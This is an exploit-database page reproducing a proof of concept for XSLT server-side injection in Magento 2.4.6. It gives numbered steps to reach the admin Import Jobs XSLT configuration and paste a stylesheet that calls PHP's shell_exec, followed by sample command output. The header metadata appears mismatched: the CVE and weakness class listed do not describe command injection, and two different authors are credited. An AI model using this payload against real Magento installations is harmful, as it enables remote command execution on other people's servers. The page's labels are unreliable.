Magento 2.4.6 XSLT Server Side Injection / Command Execution

CVE Category Price Severity
CVE-2021-33118 CWE-918 Not specified Critical
Author Risk Exploitation Type Date
Rapid7 High Remote 2023-11-23

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Magento 2.4.6 XSLT Server Side Injection / Command Execution
Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection
# Date: 2023-11-17
# Exploit Author: tmrswrr
# Vendor Homepage:
# Software Link:
# Version: 2.4.6
# Tested on: 2.4.6


1 ) Enter with admin creds this url :
2 ) Click SYSTEM > Import Jobs > Entity Type Widget > click edit 
3 ) Click XSLT Configuration  and write this payload : 

<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
xmlns:php="" >
<xsl:template match="/">
<xsl:value-of select="php:function('shell_exec','id')" />

4 ) Click Test XSL Template , You will be see "id" command result :

<?xml version="1.0"?>
uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.